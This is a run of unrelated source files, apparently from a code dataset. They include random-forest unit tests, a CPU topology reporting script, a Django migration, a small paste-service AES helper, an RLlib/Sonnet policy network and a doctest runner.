        "full depth shape should mirror leaf depth structure"

    assert np.all(fi[:,0] == li), \
        "full impurity (gini) should mirror leaf impurity structure"

    # static check
    # tree structure:
    # ~upper: left, lower: right~
    #             num obs   class 1   class 2   depth
    #   |--1      10        5         5         1
    # -0-|        34        21        13        0
    #   |   |--3  9         9         0         2
    #   |-2-|     24        16        8         1
    #       |--5  8         7         1         3
    #     |-4-|   15        7         8         2
    #       |--6  7         0         7         3

    # eta
    # (1) 10 | 24 | 0  | 0
    # (3) 9  | 15 | 10 | 0
    # (5) 8  | 7  | 9  | 10
    # (6) 7  | 8  | 9  | 10

    # Gamma (class 1)
    # (1) 5 | 9+7 = 16| 0 | 0
    # (3) 9 | 7       | 5 | 0
    # (5) 7 | 0       | 9 | 5
    # (6) 0 | 7       | 9 | 5

    # Gamma (class 2)
    # (1) 5 | 1+7 = 8| 0 | 0
    # (3) 0 | 8      | 5 | 0
    # (5) 1 | 7      | 0 | 5
    # (6) 7 | 1      | 0 | 5

    def gini(vec):
        p = vec / vec.sum()
        return p.T @ (1-p)

    class inner_fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.weighted_n_node_samples = nn
            self.children_left = cl
            self.children_right = cr
            self.value = v
            self.impurity = np.array([gini(v[i,:,:].ravel()) for i in range(v.shape[0])])

    class fake_tree():
        def __init__(self, nn, cl, cr, v):
            self.tree_ = inner_fake_tree(nn, cl, cr, v)
            # public import path (the private sklearn.tree.tree module that
            # exposed the same class was removed from scikit-learn)
            self.__class__ = sklearn.tree.DecisionTreeClassifier

    # np.int / np.float were deprecated aliases of the builtins (removed in
    # NumPy 1.24)
    weighted_n_node_samples = np.array([34,10,24,9,15,8,7], dtype = int)
    children_left = np.array([2,-1,4,-1,6,-1,-1], dtype = int)
    children_right = np.array([1,-1,3,-1,5,-1,-1], dtype = int)
    value = np.array([[21, 13],
                      [5, 5],
                      [16, 8],
                      [9, 0],
                      [7, 8],
                      [7, 1],
                      [0, 7]], dtype = float).reshape((-1,1,2))

    test = fake_tree(weighted_n_node_samples,
                     children_left,
                     children_right,
                     value)

    n_leaf = 4

    g_static, n_static, ln_static, ld_static, li_static, \
        fd_static, fi_static = \
        smooth_rf.create_Gamma_eta_tree_more_per(test)

    n_expected = np.array([[10,24,0,0],
                           [9,15,10,0],
                           [8,7,9,10],
                           [7,8,9,10]])
    g_expected = np.array([[[5,16,0,0],
                            [9,7,5,0],
                            [7,0,9,5],
                            [0,7,9,5]],
                           [[5,8,0,0],
                            [0,8,5,0],
                            [1,7,0,5],
                            [7,1,0,5]]])
    ln_expected = np.array([10,9,8,7])
    ld_expected = np.array([1,2,3,3])
    fd_expected = np.array([[1,0,0,0],
                            [2,1,0,0],
                            [3,2,1,0],
                            [3,2,1,0]])
    li_expected = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([1,3,5,6])]
    li_expected2 = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([0,2,4,4])]
    li_expected3 = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([0,0,2,2])]
    li_expected4 = np.array([gini(value[i,:,:].ravel()) for i in range(value.shape[0])])[np.array([0,0,0,0])]
    fi_expected = np.array([li_expected,li_expected2,li_expected3,li_expected4],
                           ).T

    assert np.all(g_static == g_expected), \
        "static test's Gamma failed to reproduce correct solutions"
    assert np.all(n_static == n_expected), \
        "static test's eta failed to reproduce correct solutions"
    assert np.all(ln_static == ln_expected), \
        "static test's leaf count failed to reproduce correct solutions"
    assert np.all(ld_static == ld_expected), \
        "static test's leaf depth failed to reproduce correct solutions"
    assert np.all(li_static == li_expected), \
        "static test's leaf impurity failed to reproduce correct solutions"
    assert np.all(fd_static == fd_expected), \
        "static test's full depth failed to reproduce correct solutions"
    assert np.all(fi_static == fi_expected), \
        "static test's full impurity failed to reproduce correct solutions"
def test_depth_per_node_plus_parent():
    """
    test depth_per_node_plus_parent on random forest tree

    Tests for:
    1) depth_per_node function makes sure all children are 1 (and only 1) level
    deeper
    2) structure relative to parent_mat
    """
    # data creation
    # np.int was a deprecated alias of the builtin int (removed in NumPy 1.24)
    X_train = np.concatenate(
        (np.random.normal(loc = (1,2), scale = .6, size = (100,2)),
         np.random.normal(loc = (-1.2, -.5), scale = .6, size = (100,2))),
        axis = 0)
    y_train = np.concatenate((np.zeros(100, dtype = int),
                              np.ones(100, dtype = int)))
    amount = 200

    # creating a random forest
    rf_class_known = sklearn.ensemble.RandomForestClassifier(
        n_estimators = 1,
        min_samples_leaf = 1)
    fit_rf_known = rf_class_known.fit(X = np.array(X_train)[:amount,:],
                                      y = y_train[:amount].ravel())
    forest = fit_rf_known.estimators_
    tree = forest[0]

    predicted_depth, parent_mat = smooth_rf.depth_per_node_plus_parent(tree)

    c_left = tree.tree_.children_left
    c_right = tree.tree_.children_right

    # each child must sit exactly one level below its parent
    left_minus_1 = predicted_depth[c_left != -1] - \
        predicted_depth[c_left][c_left != -1]
    right_minus_1 = predicted_depth[c_right != -1] - \
        predicted_depth[c_right][c_right != -1]

    assert np.all([np.all(left_minus_1 == -1), np.all(right_minus_1 == -1)]), \
        "parent - children depth != -1 (which it should)"

    unique_values = np.array(list(dict(Counter(predicted_depth)).keys()))
    unique_values.sort()

    assert np.all(unique_values == np.arange(len(unique_values))), \
        "jump in depth between at least one parent and child is more than 1"

    for c_idx in range(parent_mat.shape[1] - 1):
        assert np.all(parent_mat[:,c_idx] - parent_mat[:,c_idx + 1] >= 0), \
            "parents should naturally have lower index than children " + \
            "(error in parent_mat output)"

    assert np.all((parent_mat > 0).sum(axis = 1) == predicted_depth), \
        "parent_mat rows should have same number of non-zero entries "+\
        "as the depth value"
def test_create_Gamma_eta_forest_more_regression():
    """
    test create_Gamma_eta_forest_more, regression forests - standard depth only

    compares to what is expected to be returned from create_Gamma_eta_tree -
    mostly just structurally
    """
    n_obs = 200
    n_tree = 10
    min_size_leaf = 1

    # Friedman-style regression target on uniform features
    X = np.random.uniform(size = (n_obs, 510), low = -1,high = 1)
    y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
        10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n_obs)

    rf_class = sklearn.ensemble.RandomForestRegressor(n_estimators = n_tree,
                                                min_samples_leaf = min_size_leaf)
    random_forest = rf_class.fit(X = X,
                                 y = y.ravel())

    # NOTE: the eta matrix was previously unpacked into "n", silently
    # shadowing the sample count above; renamed for clarity.
    g, eta, t, ln, ld, li, fd, fi = \
        smooth_rf.create_Gamma_eta_forest_more(random_forest)

    assert g.shape == eta.shape, \
        "Gamma and eta matrices are not the correct shared size"
    assert g.shape[0] == t.shape[0], \
        "the tree index vector doesn't have the correct number of observations"
    # new checks
    assert t.shape == ln.shape and t.shape == ld.shape and t.shape == li.shape,\
        "the leaf number, depth, or impurity don't have the correct dim"
    assert g.shape == fd.shape and g.shape == fi.shape, \
        "the full depth or impurity doesn't have the correct dim"
    # ----
    assert np.all(
        np.array(list(dict(Counter(t)).keys())) == np.arange(n_tree)),\
        "tree index doesn't contain expected tree index values"

    for t_idx, tree in enumerate(random_forest.estimators_):
        # np.int was removed in NumPy 1.24; builtin int is equivalent
        max_depth_range = int(np.max(smooth_rf.depth_per_node(tree)) + 1)
        # renamed from "n_tree" which shadowed the forest-size constant above
        G_tree, eta_tree, ln_tree, ld_tree, li_tree, fd_tree, fi_tree = \
            smooth_rf.create_Gamma_eta_tree_more_per(tree)

        assert G_tree.shape[0] == np.sum(t == t_idx), \
            "shape of single Gamma from create_Gamma_eta_tree " +\
            "does not match structure from t_idx output"
        assert np.all(G_tree == g[t==t_idx,:][:,:max_depth_range]), \
            "doesn't match create_Gamma_eta_tree function for Gamma"
        if max_depth_range != g.shape[1]:
            # parenthesized so the "%" applies to the whole message; the
            # previous form ("..." % t_idx on the last fragment only) raised
            # TypeError instead of showing the message on failure
            assert np.all(g[t==t_idx,][:,max_depth_range:] == 0), \
                ("extra dimensions, based on the global forest having larger " +
                 "depth than the individual tree (num %d) in Gamma are " +
                 "non-zero") % t_idx

        assert np.all(eta_tree == eta[t==t_idx,:][:,:max_depth_range]), \
            "doesn't match create_Gamma_eta_tree function for eta"
        if max_depth_range != g.shape[1]:
            assert np.all(eta[t==t_idx,][:,max_depth_range:] == 0), \
                ("extra dimensions, based on the global forest having larger " +
                 "depth than the individual tree (num %d) in eta are " +
                 "non-zero") % t_idx

        # new checks (a duplicated leaf-number assertion was removed)
        assert np.all(ln_tree == ln[t==t_idx]), \
            "attributes in leaf number should match the base function"
        assert np.all(ld_tree == ld[t==t_idx]), \
            "attributes in leaf depth should match the base function"
        assert np.all(li_tree == li[t==t_idx]), \
            "attributes in leaf impurity should match the base function"
        assert np.all(fd_tree == fd[t==t_idx,:][:,:max_depth_range]), \
            "attributes in full depth should match the base function"
        assert np.all(fi_tree == fi[t==t_idx,:][:,:max_depth_range]), \
            "attributes in full impurity should match the base function"
def test_create_Gamma_eta_forest_more_classification():
    """
    test create_Gamma_eta_forest_more, class forests - standard depth only

    compares to what is expected to be returned from create_Gamma_eta_tree -
    mostly just structurally
    """
    n_obs = 200
    n_tree = 10
    min_size_leaf = 1

    X = np.random.uniform(size = (n_obs, 510), low = -1,high = 1)
    y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
        10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n_obs)
    # discretize the continuous response into 5 classes
    # (np.int was removed in NumPy 1.24; builtin int is equivalent)
    y_cat = np.array(pd.cut(y, bins = 5, labels = np.arange(5, dtype = int)),
                     dtype = int)
    y = y_cat
    num_classes = len(Counter(y_cat).keys())

    rf_class = sklearn.ensemble.RandomForestClassifier(n_estimators = n_tree,
                                                min_samples_leaf = min_size_leaf)
    random_forest = rf_class.fit(X = X,
                                 y = y.ravel())

    # for classification g is 3-d (class, observation, depth);
    # eta was previously unpacked into "n", shadowing the sample count
    g, eta, t, ln, ld, li, fd, fi = \
        smooth_rf.create_Gamma_eta_forest_more(random_forest)

    assert g.shape[1:] == eta.shape, \
        "Gamma and eta matrices are not the correct shared size"
    assert g.shape[1] == t.shape[0], \
        "the tree index vector doesn't have the correct number of observations"
    assert g.shape[0] == num_classes, \
        "Gamma matrix dimensions don't match the number of classes correctly"
    # new checks
    assert t.shape == ln.shape and t.shape == ld.shape and t.shape == li.shape,\
        "the leaf number, depth, or impurity don't have the correct dim"
    assert g.shape[1:] == fd.shape and g.shape[1:] == fi.shape, \
        "the full depth or impurity doesn't have the correct dim"
    # ----
    assert np.all(
        np.array(list(dict(Counter(t)).keys())) == np.arange(n_tree)),\
        "tree index doesn't contain expected tree index values"

    for t_idx, tree in enumerate(random_forest.estimators_):
        max_depth_range = int(np.max(smooth_rf.depth_per_node(tree)) + 1)
        G_tree, eta_tree, ln_tree, ld_tree, li_tree, fd_tree, fi_tree = \
            smooth_rf.create_Gamma_eta_tree_more_per(tree)

        assert G_tree.shape[1] == np.sum(t == t_idx), \
            "shape of single Gamma from create_Gamma_eta_tree " +\
            "does not match structure from t_idx output"
        assert np.all(G_tree == g[:,t==t_idx,:][:,:,:max_depth_range]), \
            "doesn't match create_Gamma_eta_tree function for Gamma"
        # Bug fix: the depth axis of the 3-d Gamma is axis 2 (axis 1 indexes
        # observations); the guard previously compared against g.shape[1],
        # which made the zero-padding check fire on the wrong condition.
        if max_depth_range != g.shape[2]:
            assert np.all(g[:,t==t_idx,][:,:,max_depth_range:] == 0), \
                ("extra dimensions, based on the global forest having larger " +
                 "depth than the individual tree (num %d) in Gamma are " +
                 "non-zero") % t_idx

        assert np.all(eta_tree == eta[t==t_idx,:][:,:max_depth_range]), \
            "doesn't match create_Gamma_eta_tree function for eta"
        if max_depth_range != g.shape[2]:
            assert np.all(eta[t==t_idx,][:,max_depth_range:] == 0), \
                ("extra dimensions, based on the global forest having larger " +
                 "depth than the individual tree (num %d) in eta are " +
                 "non-zero") % t_idx

        # new checks (a duplicated leaf-number assertion was removed)
        assert np.all(ln_tree == ln[t==t_idx]), \
            "attributes in leaf number should match the base function"
        assert np.all(ld_tree == ld[t==t_idx]), \
            "attributes in leaf depth should match the base function"
        assert np.all(li_tree == li[t==t_idx]), \
            "attributes in leaf impurity should match the base function"
        assert np.all(fd_tree == fd[t==t_idx,:][:,:max_depth_range]), \
            "attributes in full depth should match the base function"
        assert np.all(fi_tree == fi[t==t_idx,:][:,:max_depth_range]), \
            "attributes in full impurity should match the base function"
| StarcoderdataPython |
4818965 | <filename>omfgene.py
#!/usr/bin/env python
"""
omfgene.py
Queries Snaptron's discordex for evidence of gene fusions across TCGA. Reports
incidence of fusion at a given evidence level.
"""
| StarcoderdataPython |
75746 | <gh_stars>100-1000
#!/usr/bin/env python
#
# BSD LICENSE
#
# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.
# Copyright(c) 2017 Cavium, Inc. All rights reserved.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function
import sys

# Python 2/3 compatibility shim: xrange no longer exists on Python 3.
try:
    xrange # Python 2
except NameError:
    xrange = range # Python 3

# Discovered topology: distinct socket ids, distinct core ids, and a map
# from (socket, core) -> list of logical CPU (hyper-thread) ids.
sockets = []
cores = []
core_map = {}
base_path = "/sys/devices/system/cpu"

# kernel_max is the highest possible CPU index the kernel supports.
fd = open("{}/kernel_max".format(base_path))
max_cpus = int(fd.read())
fd.close()

for cpu in xrange(max_cpus + 1):
    try:
        fd = open("{}/cpu{}/topology/core_id".format(base_path, cpu))
    except IOError:
        # This CPU index is not present on this machine; try the next one.
        continue
    except:
        break
    core = int(fd.read())
    fd.close()
    fd = open("{}/cpu{}/topology/physical_package_id".format(base_path, cpu))
    socket = int(fd.read())
    fd.close()
    if core not in cores:
        cores.append(core)
    if socket not in sockets:
        sockets.append(socket)
    key = (socket, core)
    if key not in core_map:
        core_map[key] = []
    core_map[key].append(cpu)

# ---- report ---------------------------------------------------------------
print(format("=" * (47 + len(base_path))))
print("Core and Socket Information (as reported by '{}')".format(base_path))
print("{}\n".format("=" * (47 + len(base_path))))
print("cores = ", cores)
print("sockets = ", sockets)
print("")

# Column sizing: the "* 2" assumes at most two hyper-threads per core when
# estimating the widest processor id -- TODO confirm on systems with SMT > 2.
max_processor_len = len(str(len(cores) * len(sockets) * 2 - 1))
max_thread_count = len(list(core_map.values())[0])
max_core_map_len = (max_processor_len * max_thread_count) \
                   + len(", ") * (max_thread_count - 1) \
                   + len('[]') + len('Socket ')
max_core_id_len = len(str(max(cores)))

# Header row: one "Socket N" column per socket.
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
    output += " Socket %s" % str(s).ljust(max_core_map_len - len('Socket '))
print(output)

# Separator row under the header.
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
    output += " --------".ljust(max_core_map_len)
    output += " "
print(output)

# One row per core id, listing the logical CPUs in each (socket, core) cell.
for c in cores:
    output = "Core %s" % str(c).ljust(max_core_id_len)
    for s in sockets:
        if (s,c) in core_map:
            output += " " + str(core_map[(s, c)]).ljust(max_core_map_len)
        else:
            # This core id does not exist on this socket; pad the cell.
            output += " " * (max_core_map_len + 1)
    print(output)
| StarcoderdataPython |
76394 | # Copyright (c) 2021 The Ensaio Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
#
# This code is part of the Fatiando a Terra project (https://www.fatiando.org)
#
# Import functions/classes to make the public API
from ._fetchers import (
fetch_alps_gps,
fetch_britain_magnetic,
fetch_british_columbia_lidar,
fetch_bushveld_gravity,
fetch_caribbean_bathymetry,
fetch_earth_geoid,
fetch_earth_gravity,
fetch_earth_topography,
fetch_osborne_magnetic,
fetch_sierra_negra_topography,
fetch_southern_africa_gravity,
fetch_southern_africa_topography,
locate,
)
from ._version import __version__
| StarcoderdataPython |
3388600 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-03-18 15:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter Variable.value to a blank-able CharField with max_length=300."""

    dependencies = [
        ('variableServer', '0003_auto_20180710_1657'),
    ]

    operations = [
        migrations.AlterField(
            model_name='variable',
            name='value',
            field=models.CharField(blank=True, max_length=300),
        ),
    ]
| StarcoderdataPython |
4819094 | <reponame>NyanKiyoshi/CryptoPaste<filename>cryptopaste/utils.py<gh_stars>1-10
# -*- coding: utf-8 -*-
# ==== CryptoPaste
# AUTHOR: NyanKiyoshi
# COPYRIGHT: 2015 - NyanKiyoshi
# URL: https://github.com/NyanKiyoshi/CryptoPaste/
# LICENSE: https://github.com/NyanKiyoshi/CryptoPaste/master/LICENSE
#
# This file is part of CryptoPaste under the MIT license. Please take awareness about this latest before doing anything!
from random import choice, randrange
import hashlib
import base64
from Crypto import Random
from Crypto.Cipher import AES
def new_key(
        length=128, min_length=None, max_length=None,
        begin='', end='', chars='<KEY>'
):
    """Generate a random key of *length* characters drawn from *chars*.

    If min_length and/or max_length are supplied, the generated length is
    drawn with randrange() instead:
      * both given            -> randrange(min_length, max_length)
      * only min_length given -> randrange(min_length, length)
      * only max_length given -> randrange(1, max_length)

    *begin* and *end* are prepended/appended verbatim and do not count
    toward the generated length.

    NOTE(review): the default alphabet looks like a redacted placeholder
    ('<KEY>') -- confirm the intended character set.
    """
    if min_length is not None or max_length is not None:
        # Bug fix: the original called randrange(None, ...) and raised
        # TypeError when only max_length was supplied.
        lower = min_length if min_length is not None else 1
        upper = max_length if max_length is not None else length
        length = randrange(lower, upper)
    return begin + ''.join([choice(chars) for i in range(length)]) + end
class AESCipher:
    """AES-256-CBC cipher with a SHA-256-derived key and base64-encoded output.

    NOTE(review): self.bs (256) is used as the padding block size, but AES's
    block size is 16 bytes.  When len(s) is an exact multiple of 256 the
    padding calls chr(256), which raises ValueError -- confirm whether bs
    was meant to be AES.block_size (16, i.e. PKCS#7).
    """

    def __init__(self, key):
        # Padding block size (see class note); key is the 32-byte SHA-256
        # digest of the caller-supplied passphrase.
        self.bs = 256
        self.key = hashlib.sha256(key.encode()).digest()

    def encrypt(self, raw):
        # Fresh random IV per message; the IV is prepended to the ciphertext
        # so decrypt() can recover it, then the whole blob is base64-encoded.
        iv = Random.new().read(AES.block_size)
        return base64.b64encode(iv + AES.new(self.key, AES.MODE_CBC, iv).encrypt(self._pad(raw)))

    def decrypt(self, enc):
        # Split off the IV (first AES.block_size bytes), decrypt the rest,
        # strip the padding, and decode the plaintext as UTF-8.
        enc = base64.b64decode(enc)
        return self._un_pad(
            AES.new(self.key, AES.MODE_CBC, enc[:AES.block_size]).decrypt(enc[AES.block_size:])
        ).decode('utf-8')

    def _pad(self, s):
        # PKCS#7-style padding: append N copies of chr(N) up to a multiple
        # of self.bs (see the class-level note about bs=256).
        return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)

    @staticmethod
    def _un_pad(s):
        # The last byte encodes how many padding characters to strip.
        return s[:-ord(s[len(s)-1:])]
def flash_response(request, message, level=0, html=False):
    """Queue *message* on the session flash stack.

    Level 2 maps to 'info', 1 to 'warn', and anything else to 'error';
    *html* selects whether the message is flagged 'html' or 'plain'.
    """
    severity = {2: 'info', 1: 'warn'}.get(level, 'error')
    mime = 'html' if html else 'plain'
    request.session.flash((severity, message, mime))
def td_to_str(td_obj):
    """
    Convert a timedelta object to allow a "string" usage. In reality, it return a `dict`.

    :param td_obj: datetime.timedelta instance to break down
    :return: {years: x, months: x, days: x, hours: x, minutes: x, seconds: x}
    """
    # Reference durations in seconds:
    #   1 year = 31,540,000s   1 month = 2,628,000s
    #   1 day  = 86,400s       1 hour  = 3,600s      1 minute = 60s
    remaining = int(td_obj.total_seconds())
    result = {}
    # Bug fix: "/" is true division on Python 3 and produced float
    # components with a near-zero remainder; divmod keeps every value an
    # exact integer, matching the original Python 2 semantics.
    for unit, seconds in (
        ('years', 31540000),
        ('months', 2628000),
        ('days', 86400),
        ('hours', 3600),
        ('minutes', 60),
    ):
        result[unit], remaining = divmod(remaining, seconds)
    result['seconds'] = remaining
    return result
| StarcoderdataPython |
1773041 | import gym
import sonnet as snt
import tensorflow as tf
import numpy as np
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
def build_logits(action_space, latent_vec):
    """Map a latent feature vector to policy-logit outputs for a gym action space.

    Discrete spaces get one linear head; MultiDiscrete and Tuple spaces are
    handled recursively and concatenated along axis 1; Box spaces produce a
    concatenated [mean, log_std] parameterisation where log_std is a single
    state-independent variable broadcast across the batch.
    """
    if isinstance(action_space, gym.spaces.Discrete):
        # One logit per discrete action; small orthogonal init for the head.
        return snt.Linear(output_size=action_space.n,
                          initializers={'w': tf.initializers.orthogonal(np.sqrt(0.01))})(latent_vec)
    elif isinstance(action_space, gym.spaces.MultiDiscrete):
        # One Discrete head per sub-dimension, concatenated.
        return tf.concat([build_logits(gym.spaces.Discrete(n), latent_vec) for n in action_space.nvec], axis=1)
    elif isinstance(action_space, gym.spaces.Box):
        # Only flat (1-d) continuous action spaces are supported.
        assert len(action_space.shape) == 1
        mean = snt.Linear(output_size=action_space.shape[0],
                          initializers={'w': tf.initializers.orthogonal(np.sqrt(0.01))})(latent_vec)
        log_std = tf.get_variable(name='log_std', shape=[1, action_space.shape[0]], initializer=tf.zeros_initializer())
        # "mean * 0.0 + log_std" broadcasts log_std to the batch dimension.
        return tf.concat([mean, mean * 0.0 + log_std], axis=1)
    elif isinstance(action_space, gym.spaces.Tuple):
        return tf.concat([build_logits(space, latent_vec) for space in action_space.spaces], axis=1)
    else:
        raise NotImplementedError(f"Action space of type {type(action_space)} is not supported.")
class NatureModel(snt.AbstractModule):
    """Sonnet module implementing the Nature-DQN convolutional torso.

    _build() returns (policy_logits, value_baseline) computed from stacked
    spatial observations, optionally concatenated with a flat non-spatial
    feature vector before the output heads.
    """

    def __init__(self, action_space, _sentinel=None, custom_getter=None, name=None):
        super().__init__(_sentinel, custom_getter, name)
        # Stored so _build() can size the policy head via build_logits().
        self.action_space = action_space

    def _build(self, spatial_obs, non_spatial_obs=None, *unused_args, **unused_kwargs):
        # Nature DQN stack: 8x8/stride 4, 4x4/stride 2, 3x3/stride 1 convs,
        # each followed by ReLU, then a 512-unit dense layer.
        conv_out = snt.Conv2D(output_channels=32, kernel_shape=8, stride=4,
                              initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(spatial_obs)
        conv_out = tf.nn.relu(conv_out)
        conv_out = snt.Conv2D(output_channels=64, kernel_shape=4, stride=2,
                              initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(conv_out)
        conv_out = tf.nn.relu(conv_out)
        conv_out = snt.Conv2D(output_channels=64, kernel_shape=3, stride=1,
                              initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(conv_out)
        conv_out = tf.nn.relu(conv_out)
        conv_out = snt.BatchFlatten()(conv_out)
        conv_out = snt.Linear(output_size=512, initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(conv_out)
        conv_out = tf.nn.relu(conv_out)
        if non_spatial_obs is not None:
            # Append extra (already flat) features before the output heads.
            conv_out = tf.concat([conv_out, non_spatial_obs], axis=-1)
        logits = build_logits(action_space=self.action_space, latent_vec=conv_out)
        baseline = snt.Linear(output_size=1,
                              initializers={'w': tf.initializers.orthogonal(np.sqrt(0.01))})(conv_out)
        return logits, baseline
class DoomNatureModel(TFModelV2):
    """RLlib TFModelV2 wrapper around NatureModel.

    forward() caches the value baseline on self so value_function() can
    return it, per the TFModelV2 contract.
    """

    def __init__(self, obs_space, action_space, num_outputs, model_config, name):
        super().__init__(obs_space, action_space, num_outputs, model_config, name)
        self.model = NatureModel(action_space)

    def forward(self, input_dict, state, seq_lens):
        obs, prev_actions = input_dict['obs'], input_dict["prev_actions"]
        # Tuple/list observations carry (spatial, non_spatial) components.
        if isinstance(obs, tuple) or isinstance(obs, list):
            logits, baseline = self.model(obs[0], non_spatial_obs=obs[1])
        else:
            logits, baseline = self.model(obs)
        # Flatten to shape [batch] as value_function() must return.
        self.baseline = tf.reshape(baseline, [-1])
        return logits, state

    def variables(self, as_dict=False):
        # Sonnet modules only expose variables after their first connection
        # to the graph.
        if not self.model.is_connected:
            var_list = []
        else:
            var_list = self.model.variables
        if as_dict:
            return {v.name: v for v in var_list}
        return var_list

    def value_function(self):
        return self.baseline
| StarcoderdataPython |
1619717 | #!/usr/bin/python
# testdoc.py [-d] [-r] file
import sys
import os, os.path
import doctest
import warnings
from doctest_tools import setpath
debug = False
warnings.simplefilter('default')
def import_module(modulepath, remove_first_path = False, full = True):
    r"""Imports the module indicated by modulepath.

    Also adds the proper containing directories to Python's sys.path.

    Returns the imported module.
    """
    pythonpath = \
      setpath.setpath(modulepath, remove_first=remove_first_path, full=full)
    if debug:
        sys.stderr.write("setpath added: %s\n" % (pythonpath,))
    # Strip the sys.path root (plus its path separator) so what remains is
    # a package-relative path.
    modulepath = modulepath[len(pythonpath[0]) + 1:]
    if debug:
        sys.stderr.write("modulepath: %s\n" % (modulepath,))
    # Convert the relative path into a dotted module name.
    modulename = modulepath.replace('/', '.').replace(os.path.sep, '.')
    if debug:
        sys.stderr.write("modulename: %s\n" % (modulename,))
    # __import__ returns the top-level package; walk down to the leaf module.
    module = __import__(modulename)
    for comp in modulename.split('.')[1:]:
        module = getattr(module, comp)
    return module
def test(path, remove_first_path = False, full = True):
    r"""Runs doctest on the file indicated by 'path'.

    This will run testmod if the file ends in .py, .pyc or .pyo; and testfile
    for all other files.

    When running testfile on python 2.5, it enables Python's "with" statement
    (as if the file being tested had done "from __future__ import
    with_statement").  This is done because doing the __future__ import does
    not work in files. :-(

    Also when running testfile, the current working directory is first set to
    the directory containing the file.  This is not done for python modules
    (.py, .pyc or .pyo files).

    In all cases, all non-package directories containing package directories
    (i.e., directories containing an __init__.{py,pyc,pyo} file) are added to
    sys.path.  The search is started in the directory containing the file.  If
    the bottom-most directory is not a package directory, it is added to the
    path too.
    """
    path = os.path.normpath(path)
    fullpath = os.path.abspath(path)
    # Python modules: strip the extension and import, then run testmod below.
    if path.endswith('.py'):
        module = import_module(fullpath[:-3], remove_first_path, full)
    elif path.endswith(('.pyc', '.pyo')):
        module = import_module(fullpath[:-4], remove_first_path, full)
    else:
        # Non-module file: set up sys.path, chdir next to the file, and run
        # doctest.testfile on it.
        new_paths = \
          setpath.setpath(fullpath, remove_first=remove_first_path, full=full)
        if debug:
            sys.stderr.write("setpath added: %s\n" % (new_paths,))
        os.chdir(os.path.dirname(fullpath))
        if sys.version_info[:2] == (2, 5):
            # Python 2.5 only: inject the with_statement feature into the
            # doctest globals (files cannot do __future__ imports themselves).
            import __future__
            return doctest.testfile(fullpath, False,
                                    globs={
                                        'with_statement':
                                            __future__.with_statement,
                                    })
        else:
            return doctest.testfile(fullpath, False)
    # Flag checked by some modules to detect they are being doctested.
    module.doing_doctest = True
    return doctest.testmod(module)
def usage():
    """Write the command-line help text to stderr and exit with status 2."""
    prog_name = os.path.basename(sys.argv[0])
    sys.stderr.write(
        "usage: %s [-d] [-r] file\n"
        "    if -d is specified, debug output is turned on\n"
        "    if -r is specified, the number of errors "
        "and tests is printed to stderr\n"
        % prog_name)
    sys.exit(2)
def run_command(remove_first_path = False):
    r"""Parse sys.argv, run doctest on the named file, and report the result.

    Flags: -d turns on debug output; -r prints the error and test counts to
    stdout separated by a space.  Exits with status 1 when any doctest
    reports errors.
    """
    global debug
    print_numbers = False
    args = sys.argv[1:]
    if not args:
        usage()
    if args[0] in ('-h', '--help'):
        usage()
    if args[0] == '-d':
        if len(args) < 2:
            usage()
        debug = True
        del args[0]
    if args[0] == '-r':
        if len(args) < 2:
            usage()
        print_numbers = True
        del args[0]
    if len(args) != 1:
        usage()
    filename = args[0]
    try:
        errors, tests = test(filename, remove_first_path)
    except IOError:
        sys.stdout.write("%s: file not found\n\n" % filename)
        usage()
    except ImportError:
        sys.stdout.write("%s: module not found\n\n" % filename)
        usage()
    if print_numbers:
        sys.stdout.write("TESTDOC RESULTS: Errors %d, Tests %d\n" %
                         (errors, tests))
    if errors: sys.exit(1)
if __name__ == "__main__":
run_command()
| StarcoderdataPython |
1759697 | #import matplotlib.pyplot as plt
def append_history(history, h):
    '''
    Append the per-epoch statistics in *h* onto *history*.

